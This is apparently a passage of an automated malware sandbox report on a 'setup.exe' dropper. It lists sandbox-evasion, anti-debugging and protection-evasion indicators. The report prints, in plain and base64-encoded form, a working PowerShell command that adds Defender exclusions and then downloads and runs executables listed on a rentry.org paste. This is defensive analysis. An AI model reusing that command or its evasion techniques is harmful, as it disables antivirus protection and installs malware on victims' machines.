                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\SysWOW64\OpenWith.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@|-7PXNW
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE33
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\^Q
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE`,^Q
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
                        Source: OpenWith.exe, 00000011.00000002.2399474897.0000000004590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EXEAUTORUNSC.EXERESOUR
                        Source: C:\Users\user\Desktop\setup.exeMemory allocated: 810000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeMemory allocated: 1A7B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeMemory allocated: 2A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeMemory allocated: 4A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6110Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3783Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeWindow / User API: threadDelayed 2081Jump to behavior
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 1581
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7106
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2033
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Steam\d3dcompiler_47.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Steam\libEGL.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\nsExec.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\libGLESv2.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\vk_swiftshader.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\StdUtils.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\vulkan-1.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\app.asar.unpacked\node_modules\ps-list\vendor\fastlist-0.3.0-x86.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\app.asar.unpacked\node_modules\ps-list\vendor\fastlist-0.3.0-x64.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\nsis7z.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\libEGL.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\elevate.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\System.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb26E8.tmp\7z-out\resources\InjectorJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Steam\libGLESv2.dllJump to dropped file
                        Source: C:\Users\user\Desktop\setup.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7704Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe TID: 7268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe TID: 7504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe TID: 5348Thread sleep count: 2081 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe TID: 5348Thread sleep time: -52025s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 1608Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1460Thread sleep count: 7106 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep count: 2033 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3864Thread sleep time: -26747778906878833s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1700Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809
                        Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeThread sleep count: Count: 2081 delay: -25Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\setup.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Temp\2030.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\AppData\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeFile opened: C:\Users\user\Jump to behavior
                        Source: powershell.exe, 00000001.00000002.2395090715.0000012344272000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWure%SystemRoot%\system32\mswsock.dll Mechanism FailureProtecting Resource FailureDatabase InconsistencyAuthentication FailureBreach of ConfidentialityCable TamperDelayed InformationDuplicate InformationInformation MissingInformation ModificationInformation Out of SequenceKey ExpiredNon-Repudiation FailureOut of Hours ActivityOut of ServiceProcedural ErrorUnexpected InformationDMTF ReservedProbableCauseDescription
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.0000000005420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: bCK1sK9IRQq9qEmUv4RDsNuESgMjGWdqb8FuvAY5N9GIIvejQjBAMA8GA1UdEwEB/wQFMAMB
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2489150717.0000000003211000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmncVMware Screen Codec / VMware Videovp5On2 VP5vp6On2 VP6vp6fOn2 VP6 (Flash version)targaTruevision Targa imageimage/x-targaimage/x-tgab
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe`,^q
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSDKVersion() < 27 && IsAdreno5xxOrOlder(functions)) || (!isMesa && IsMaliT8xxOrOlder(functions)) || (!isMesa && IsMaliG31OrOlder(functions))
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2407477659.0000000004B20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IIAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTest
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002A51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@|-7pxnW
                        Source: okdtlfsk.k4u0.exe, 00000007.00000002.2333234648.0000000002E14000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\^q
                        Source: OpenWith.exe, 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                        Source: OpenWith.exe, 00000011.00000003.2359890037.0000000005060000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2485020119.0000000005420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
                        Source: okdtlfsk.k4u3.exe, 0000000B.00000003.2489150717.0000000003211000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Screen Codec / VMware Video
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeCode function: 7_2_028D2E48 CheckRemoteDebuggerPresent,7_2_028D2E48
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00829AB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00829AB4
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_3_00832277 mov eax, dword ptr fs:[00000030h]9_3_00832277
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00832277 mov eax, dword ptr fs:[00000030h]9_2_00832277
                        Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 17_3_02A90283 mov eax, dword ptr fs:[00000030h]17_3_02A90283
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00824E5A GetProcessHeap,RtlAllocateHeap,GetModuleFileNameW,_wcsrchr,lstrlenW,GetProcessHeap,RtlFreeHeap,MulDiv,9_2_00824E5A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00829AB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00829AB4
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_00825A33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00825A33
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeCode function: 9_2_008255A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_008255A9
                        Source: C:\Users\user\Desktop\setup.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: Yara matchFile source: amsi64_7548.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\setup.exeProcess created: Base64 decoded <#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> (Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> (Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>
                        Source: C:\Users\user\Desktop\setup.exeProcess created: Base64 decoded <#bji#> Add-MpPreference <#gap#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#zkd#> -Force <#hep#>;$wc = (New-Object System.Net.WebClient);$lnk = $wc.DownloadString('https://rentry.org/lem61111111111/raw').Split([string[]]"`r`n", [StringSplitOptions]::None); $fn = [System.IO.Path]::GetRandomFileName(); for ($i=0; $i -lt $lnk.Length; $i++) { $wc.DownloadFile($lnk[$i], <#nmy#> (Join-Path <#cpg#> -Path $env:AppData <#jig#> -ChildPath ($fn + $i.ToString() + '.exe'))) }<#bwf#>; for ($i=0; $i -lt $lnk.Length; $i++) { Start-Process -FilePath <#nzz#> (Join-Path -Path $env:AppData <#qua#> -ChildPath ($fn + $i.ToString() + '.exe')) } <#idz#>Jump to behavior
                        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where node
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe msiexec /i nodejs-installer.msi /quiet
